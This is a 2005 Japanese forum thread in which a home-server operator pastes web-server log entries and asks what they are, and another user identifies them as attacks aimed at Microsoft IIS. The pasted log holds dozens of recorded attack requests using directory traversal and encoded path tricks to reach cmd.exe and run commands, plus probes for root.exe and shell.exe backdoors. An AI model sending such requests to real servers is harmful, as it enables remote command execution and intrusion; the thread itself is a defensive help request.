投稿日:2005年03月01日 作成鷹の巣

No.18468 AN HTTPDのログにちょっと不可解な痕跡が残っている。



AN HTTPDのログにちょっと不可解な痕跡が残っている。

No.18468 投稿時間:2005年03月01日(Tue) 20:35 投稿者名:RT URL:

こんにちは。皆様のおかげで、去年の12月から自宅サーバーを運営しております。
ANHTTPDのログにちょっと不可解な痕跡が残っているのですが、どなたかご教示願えませんでしょうか?
できれば対策なども教えていただけるとうれしいです。以下、コピペします。

69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:55:58 +0900] "GET /..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:55:59 +0900] "GET /../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:00 +0900] "GET /_vti_bin/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:01 +0900] "GET /_vti_bin/..・c..c5c..c5c..c5c..c5c../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:02 +0900] "GET /_vti_bin/..・c..・c..・c..・c..・c../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:03 +0900] "GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:04 +0900] "GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:05 +0900] "GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:06 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:07 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:08 +0900] "GET /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:09 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:09 +0900] "GET /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:10 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:11 +0900] "GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 211
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:13 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:13 +0900] "GET /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:14 +0900] "GET /iisadmpwd/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:15 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:16 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:17 +0900] "GET /msadc/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:18 +0900] "GET /MSADC/..・c..c5c..c5c..c5cwinnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:19 +0900] "GET /msadc/..・c../..c5c../..c5c../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:20 +0900] "GET /MSADC/..・c..・c..・c..・cwinnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:21 +0900] "GET /msadc/..・c../..・c../..・c../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:22 +0900] "GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:23 +0900] "GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:24 +0900] "GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:25 +0900] "GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:26 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:27 +0900] "GET /../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:28 +0900] "GET /msadc/../・€/ッ../../・€/ッ../../・€/ッ../winnt/system32/cmd.exe/ HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:29 +0900] "GET /msdac/root.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:29 +0900] "GET /msdac/shell.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:30 +0900] "GET /PBServer/..・c..c5c..c5cwinnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:31 +0900] "GET /PBServer/..・c..・c..・cwinnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:32 +0900] "GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:33 +0900] "GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:34 +0900] "GET /Rpc/..・c..c5c..c5cwinnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:35 +0900] "GET /Rpc/..・c..・c..・cwinnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:36 +0900] "GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:37 +0900] "GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:38 +0900] "GET /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:39 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:40 +0900] "GET /winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:41 +0900] "GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 211
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:42 +0900] "GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 211
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:43 +0900] "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 211
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:44 +0900] "GET /scripts/..タ ../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:44 +0900] "GET Mozilla/3.0 (compatible; Indy Library) -> /scripts/..Э..Э..Э..Эwinnt/system32/cmd.exe
?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:45 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:46 +0900] "GET /scripts/..誓../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:47 +0900] "GET /scripts/..チ..チ..チ..チwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 211
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:48 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:49 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:50 +0900] "GET /../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:51 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:52 +0900] "GET /scripts/..o../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:53 +0900] "GET /scripts/..疏../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:54 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:55 +0900] "GET /scripts/..€ッ../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:56 +0900] "GET /scripts/..€€ッ../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:57 +0900] "GET /scripts/..・€€€ッ../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:58 +0900] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 211
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:59 +0900] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 211


IIS以外のWebサーバの場合無害なので、無視しても問題ありません。

No.18469 投稿時間:2005年03月01日(Tue) 20:45 投稿者名:ほげ URL:

はじめまして。

IISサーバを狙ったセキリティー攻撃です。
IIS以外のWebサーバの場合無害なので、無視しても問題ありません。

攻撃の詳細は、一部のログを検索したら、沢山でますので。


ありがとうございます。

No.18472 投稿時間:2005年03月01日(Tue) 21:02 投稿者名:RT URL:

ほげさん、どうもありがとうございました!
おかげで、安心して続けられます!

実はこのような攻撃、2度目でして、すごく焦ってたんですよね~

ほっとしました!


思いのほか長くなってしまいました。

No.18471 投稿時間:2005年03月01日(Tue) 20:59 投稿者名:RT URL:

思いのほか長くなってしまいました(汗)。
すみません<(_ _)>


|目次|掲示板|過去ログ目次|▲頁先頭|